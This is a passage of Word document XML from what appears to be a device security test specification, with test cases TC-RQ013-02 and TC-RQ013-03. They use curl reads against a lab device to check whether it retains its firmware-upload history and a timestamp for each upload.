          </w:tcPr>
          <w:p w14:paraId="52509584" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">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1B3D8F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement if the device retains a queryable, per-upload history including previous versions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7884B860" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341" w:rsidP="00655E93">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1B3D8F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected = FAIL: only the current version is reported; no record of prior uploads persists → confirms G-1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="661ADE88" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00AF57B2" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD7F541" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">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906341" w14:paraId="78E27FF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AE87D08" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14115B26" w14:textId="77777777" w:rsidR="00906341"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06341" w14:paraId="575060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542BA8" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C1B887F" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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TC-RQ013-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00F15AEA" w14:paraId="20BFD52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18E46D3" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3FE17A"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Spare DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB9AA1C"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Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="085EA03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602E79" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56E3CFD7" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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curl (version reads); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA95CEB" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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firmware-update procedure (rotary 999 + reboot + BLOB upload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="2D90E91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34B60C" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E38A4F4"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20"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ013-02 Two successive uploads; search for retained history of prior versions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E1D0020"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curl -s http://192.168.0.2/firmware/version -o TC1302_ver_A.json # v_A (current)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699AC382"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curl -s http://192.168.0.2/deviceinfo/swrevision -o TC1302_swrev_A.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714B440A"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 --- UPLOAD v_B (999 + reboot; BLOB upload; /firmware/install; reboot) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7E3076"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curl -s http://192.168.0.2/firmware/version -o TC1302_ver_B.json # expect: v_B only</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57161062"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grep -i "$(jq -r .value TC1302_ver_A.json)" TC1302_ver_B.json TC1302_swrev_A.json &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="047F60A3"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echo "No device-resident record of previous version v_A" # expect: none</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25AB094F"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 UPLOAD v_C; repeat search for v_A and v_B ---</w:t>
            </w:r>
            <w:commentRangeEnd w:id="20"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="20"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="406BA31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4B5646" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04398E61" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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Only the current version reported after each upload; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F17D5A3" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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no previous-version field or upload-history list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00AD4B09" w14:paraId="056FC69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C5D3B4A" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB88916"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>per-upload history retained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="4D378AF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217DA5" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BDDFC09" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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TC1302_ver_A/B.json, history-search output; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1A979F" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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re-flash log to validated image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66DC497A" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFBBC4A" w14:textId="67A423BE" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E77F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ013-03 </w:t>
      </w:r>
      <w:r w:rsidR="00FC0B48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="009E77F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Per-Upload Timestamp Absence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73733D18" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="005E1121" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1121">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14:paraId="67D964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FBB63C" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218AE0A8" w14:textId="77777777" w:rsidR="00906341"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06341" w14:paraId="798FDE7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E1EF79" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BACA703" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="5097"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD6A87">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ013-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00AB1D3A" w14:paraId="4F843E0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55E31B" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CF64A11" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00AB1D3A"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it-IT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E16BBA">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>RQ-013 → CR 2.11 / CR 3.9 → Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00D67CA6" w14:paraId="10AC18B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4D4454" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7243088E" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4549"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A1A7F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w14:paraId="00D3E5F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53CD1F7" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="794FAE05" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D"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20C7D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3 (Vulnerability Testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="211F5BA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C2ACB3D" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C3C311" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1143"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B845E1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that a firmware upload carries no absolute per-upload timestamp: no RTC, the install forces a cold start that resets uptime, and no date/time is attached to the version change</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B845E1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>so the mandated "5 years after each upload" retention clock cannot be established on-device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="50AE3CC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B0C3F3B" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE2964C"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901F7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Read the systick/uptime and current version before an upload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22ACAF9D"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901F7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Perform an upload (forces install reboot). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55D9D0E2"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901F7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. After reboot, read systick/uptime and version. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202F4672" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D"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901F7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Confirm the time base reset and that no absolute date/time is associated with the upload event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="50C750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75FB048" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CFAA741" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341"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D125AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement if a per-upload absolute timestamp is </w:t>
            </w:r>
            <w:r w:rsidRPr="00D125AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">recorded and retained. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76EF2E12" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341"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D125AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected = FAIL: uptime resets, no RTC, no absolute time on the version change → per-upload retention clock cannot be started</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="097ADBD8" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00AF57B2" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4950B074" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">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906341" w14:paraId="6CA84A4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8E3AD1" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6673343F" w14:textId="77777777" w:rsidR="00906341"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06341" w14:paraId="52FE7F9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3737A7" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545EC6D3" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50"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TC-RQ013-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00F15AEA" w14:paraId="487C822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871B620" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D649D2E"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Spare DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EE9FFC"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Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00BB230F" w14:paraId="50F2C0F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9AED4F" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318EDE4B" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006E4D50" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2971"/>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curl (/systemtime/systick, version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="6A2FD7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BE23FF1" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01BBC377"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21"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ013-03 Confirm no absolute per-upload timestamp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B466794"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 xml:space="preserve">curl -s </w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidRPr="006E4D50">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="EE0000"/>
                  <w:lang w:val="pt-BR"/>
                </w:rPr>
                <w:t>http://192.168.0.2/systemtime/systick</w:t>
              </w:r>
